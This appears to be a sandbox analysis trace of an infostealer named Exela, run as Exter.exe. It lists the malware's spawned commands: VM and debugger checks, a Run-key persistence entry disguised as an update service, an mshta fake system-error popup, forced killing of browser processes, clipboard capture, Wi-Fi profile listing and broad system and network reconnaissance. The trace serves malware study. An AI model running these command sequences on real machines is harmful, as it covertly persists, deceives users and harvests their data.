C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer4⤵PID:4896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"3⤵PID:4716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:3056
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"3⤵PID:2860
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer4⤵PID:3208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3864
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:3192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:2136
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:4640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"3⤵PID:2508
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f4⤵
- Adds Run key to start application
PID:1292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""3⤵PID:4412
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2860
-
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"4⤵PID:2780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:3400
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:3056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2140"3⤵PID:1376
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21404⤵
- Kills process with taskkill
PID:4640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4296"3⤵PID:4300
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42964⤵
- Kills process with taskkill
PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2420"3⤵PID:3116
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24204⤵
- Kills process with taskkill
PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2344"3⤵PID:960
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 23444⤵
- Kills process with taskkill
PID:3128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1444"3⤵PID:2556
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14444⤵
- Kills process with taskkill
PID:5712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3012"3⤵PID:5744
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30124⤵
- Kills process with taskkill
PID:3856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1796"3⤵PID:6024
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17964⤵
- Kills process with taskkill
PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1148"3⤵PID:6136
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 11484⤵
- Kills process with taskkill
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4752"3⤵PID:5100
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47524⤵
- Kills process with taskkill
PID:1564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3852"3⤵PID:4868
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38524⤵
- Kills process with taskkill
PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2472"3⤵PID:2132
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24724⤵
- Kills process with taskkill
PID:2580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:3864
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:2272
-
C:\Windows\system32\chcp.comchcp5⤵PID:4296
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:3056
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:3044
-
C:\Windows\system32\chcp.comchcp5⤵PID:4956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3184
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"3⤵PID:2236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard4⤵PID:1484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"3⤵PID:700
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5232
-
-
C:\Windows\system32\HOSTNAME.EXEhostname4⤵PID:5404
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername4⤵
- Collects information from the system
PID:5420
-
-
C:\Windows\system32\net.exenet user4⤵PID:5452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵PID:5468
-
-
-
C:\Windows\system32\query.exequery user4⤵PID:5484
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"5⤵PID:5500
-
-
-
C:\Windows\system32\net.exenet localgroup4⤵PID:5516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:5728
-
-
-
C:\Windows\system32\net.exenet localgroup administrators4⤵PID:5540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:5556
-
-
-
C:\Windows\system32\net.exenet user guest4⤵PID:5572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest5⤵PID:5584
-
-
-
C:\Windows\system32\net.exenet user administrator4⤵PID:5608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator5⤵PID:5624
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command4⤵PID:5732
-
-
C:\Windows\system32\tasklist.exetasklist /svc4⤵
- Enumerates processes with tasklist
PID:5656
-
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:5684
-
-
C:\Windows\system32\ROUTE.EXEroute print4⤵PID:5708
-
-
C:\Windows\system32\ARP.EXEarp -a4⤵PID:1956
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
PID:2556
-
-
C:\Windows\system32\sc.exesc query type= service state= all4⤵
- Launches sc.exe
PID:6016
-
-
C:\Windows\system32\netsh.exenetsh firewall show state4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5740
-
-
C:\Windows\system32\netsh.exenetsh firewall show config4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵PID:5132
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:5988
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:6020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:6120
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:6064
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:3440
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\PopHide.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3200
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:2416
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of SetWindowsHookEx
PID:4300 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4300 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1460 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc80593cb8,0x7ffc80593cc8,0x7ffc80593cd82⤵PID:4316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:22⤵PID:1404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:32⤵PID:3344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:82⤵PID:4484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:12⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:2784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:12⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:12⤵PID:5684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:12⤵PID:5612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3632 /prefetch:82⤵PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3596 /prefetch:82⤵PID:3200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵PID:5720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:12⤵PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7748936417788344948,10623797144838674838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:82⤵PID:5908
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5180
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2276
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"1⤵PID:2508
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"2⤵PID:5748
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:3364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:5996
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"3⤵PID:2028
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer4⤵PID:5288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"3⤵PID:4972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:4764
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:4140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"3⤵PID:4176
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer4⤵PID:3420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:656
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:5260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:5532
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"3⤵PID:3920
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f4⤵
- Adds Run key to start application
PID:5572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""3⤵PID:5796
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"4⤵PID:5328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:5684
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:3748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1460"3⤵PID:4016
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14604⤵
- Kills process with taskkill
PID:552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4316"3⤵PID:3364
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 43164⤵
- Kills process with taskkill
PID:4752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1404"3⤵PID:4912
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14044⤵
- Kills process with taskkill
PID:5728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3344"3⤵PID:4972
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 33444⤵
- Kills process with taskkill
PID:5164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4484"3⤵PID:3184
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 44844⤵
- Kills process with taskkill
PID:5172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5664"3⤵PID:824
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 56644⤵
- Kills process with taskkill
PID:5440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5612"3⤵PID:5456
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 56124⤵
- Kills process with taskkill
PID:1540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4660"3⤵PID:5756
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46604⤵
- Kills process with taskkill
PID:5668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5720"3⤵PID:1820
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 57204⤵
- Kills process with taskkill
PID:3200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5616"3⤵PID:5228
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 56164⤵
- Kills process with taskkill
PID:6140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:4412
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:2436
-
C:\Windows\system32\chcp.comchcp5⤵PID:1768
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:4844
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:3208
-
C:\Windows\system32\chcp.comchcp5⤵PID:5596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4820
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"3⤵PID:5852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard4⤵PID:5280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵PID:1116
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"3⤵PID:1476
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:6100
-
-
C:\Windows\system32\HOSTNAME.EXEhostname4⤵PID:5624
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername4⤵
- Collects information from the system
PID:2092
-
-
C:\Windows\system32\net.exenet user4⤵PID:648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵PID:3220
-
-
-
C:\Windows\system32\query.exequery user4⤵PID:1388
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"5⤵PID:5108
-
-
-
C:\Windows\system32\net.exenet localgroup4⤵PID:200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:5516
-
-
-
C:\Windows\system32\net.exenet localgroup administrators4⤵PID:5712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:3608
-
-
-
C:\Windows\system32\net.exenet user guest4⤵PID:5744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest5⤵PID:5140
-
-
-
C:\Windows\system32\net.exenet user administrator4⤵PID:3784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator5⤵PID:4648
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command4⤵PID:4716
-
-
C:\Windows\system32\tasklist.exetasklist /svc4⤵
- Enumerates processes with tasklist
PID:5728
-
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:5312
-
-
C:\Windows\system32\ROUTE.EXEroute print4⤵PID:2860
-
-
C:\Windows\system32\ARP.EXEarp -a4⤵PID:5592
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
PID:3124
-
-
C:\Windows\system32\sc.exesc query type= service state= all4⤵
- Launches sc.exe
PID:5572
-
-
C:\Windows\system32\netsh.exenetsh firewall show state4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3132
-
-
C:\Windows\system32\netsh.exenetsh firewall show config4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4352
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1960
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2436
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5244 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc80593cb8,0x7ffc80593cc8,0x7ffc80593cd82⤵PID:4484
-
-
